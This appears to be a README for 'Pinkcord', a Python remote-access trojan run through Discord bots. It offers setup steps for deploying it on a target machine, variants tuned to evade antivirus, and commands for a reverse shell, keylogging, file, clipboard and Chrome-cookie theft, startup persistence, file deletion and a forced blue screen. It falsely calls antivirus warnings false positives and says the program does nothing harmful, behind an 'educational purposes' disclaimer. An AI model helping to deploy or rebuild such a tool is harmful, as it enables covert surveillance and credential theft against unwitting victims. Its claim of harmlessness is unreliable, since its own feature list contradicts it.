Pinkcord is a computer virus written in Python that utilizes Discord bots to transmit information. Please note that this program was created solely for educational purposes, and it should not be used to engage in any illegal activities. The use of Pinkcord may have severe legal consequences, including the banning of your Discord account. Download and use this program responsibly. to put it simply, pinkcord can be compared to meterpreter from metasploit only pinkcord works outside the local network and transmits data via discord and slightly different functions
When running Pinkcord, you may receive a warning from Windows Defender. This is because the program uses certain command-line instructions that can be flagged by antivirus software. Please be assured that this warning is a false positive due to the nature of the commands used, and not because of any malicious intent. Pinkcord is designed solely for ethical and educational purposes. You should not be alarmed by this warning, as the program does not perform any harmful actions on your system.
- Install Python from the official website.
- Download the files from this repository.
- Open a command prompt on Windows or a terminal on Linux and run python setup.py. If that doesn't work, try py setup.py. or if you are on windows you can just click on setup.bat
- Follow the instructions provided.
- if the program compiles to exe. just enable it on the computer you want to control
the program was written for windows, so a large amount may not work on normal linux, and even more so on termux or mac. it is possible that in the future there will be an adaptation of pinkcord to more platforms
you can choose the versions at setup
pinkcord_minimal.py
- the minimal version, the hardest to detect, has only reverse shell functions [less than 8mb]pinkcord_lite.py
- has everything that the minimum version has, but unlike it, it can upload files and steal them, it has the function of taking screenshots, it can be slightly more detected by antiviruses [up to 35mb with a pillow installed, without a pillow about 15mb]pinkcord.py
- it has all the features but antiviruses often detect it [up to 45mb with a pillow installed, without a pillow about 20mb]
The following commands can be used with Pinkcord:
!shell [session] [output(yes, no)] [command]
: Executes a shell command on a remote computer.all versions
!ss [session]
: Captures a screenshot from a remote computer.pinkcord.py and pinkcord lite
!keylogger [session] [action(start, stop, log)]
: Starts or stops a keylogger on a remote computer.only in pinkcord.py
!steal [session] [file_names]
: Steals files from a remote computer.pinkcord.py and pinkcord lite
!info [session]
: Retrieves information about the remote computer system.only in pinkcord.py
!cd [session] [path]
: Changes the current directory on the remote computer.all versions
!up [session]
: Increases the volume on the remote computer.only in pinkcord.py
!down [session]
: Decreases the volume on the remote computer.only in pinkcord.py
!message [session] [title] [button] [message]
: Displays a message on the remote computer.only in pinkcord.py
!dir [session]
: Displays the current directory on the remote computer.all versions
!upload [session] [link] [file_name]
: Sends a file to the remote computer.pinkcord.py and pinkcord lite
!click [session] [x] [y]
: Clicks at a specific location on the screen.only in pinkcord.py
!press [session] [key]
: Presses a specific key (default: Enter).only in pinkcord.py
!cli [session]
: Copies the clipboard content.only in pinkcord.py
!write [session] [message]
: Types using the keyboard.only in pinkcord.py
!loc [session]
: Displays IP information.only in pinkcord.py
!cdrom [session]
: Opens the CD-ROM drive.only in pinkcord.py
!sessions
: Displays all sessions.all versions
!rename [session] [new_name]
: Changes the name of a session.all versions
!shutdown [session]
: Shuts down the remote computer.all versions
!startup [session] [file path]
: copy file to startup folder (you can copy pinkcord exe file)only in pinkcord.py
!restart [session]
- Restart the remote computer.all versions
!chrome [session] [action(cookie)]
- steals selected data from chromeonly in pinkcord.py
!delete [session] [path]
- Deletes a file from the remote computer.all versions
!wallpaper [session] [path]
- changes the wallpaper on the remote computer.only in pinkcord.py
!kill [session] [task]
- remote task killing.all versions
!bsod [session]
- display bsod(blue screan of death).only in pinkcord.py
The following libraries are used in Pinkcord:
os
: Execution of system commands.threading
: Launching a keylogger in another thread.time
: Pausing the program for a specific duration using the sleep function.zipfile
: Zipping data.discord.py
: Communicating with Discord.pyautogui
: Providing various functions related to user interface automation.requests
: Communicating with other websites.keyboard
: Operating the keyboard.base64
: Encoding the token and program.codecs
: Encoding the token and program.sys
: Running Python commands.pyperclip
: Stealing data from the clipboard.subprocess
: Performing system functions.platform
: Recognizing the platform.shutil
: Copy files to startup.sqlite3
: Opening a Chrome cookie file.json
: Getting the decryption key.win32crypt
: Decrypting cookies.Cryptodome.Cipher
: Decrypting cookies.ctypes
: change wallpaper and display bsod.
Please exercise caution and use this program responsibly. Remember that engaging in any illegal activities can result in serious consequences.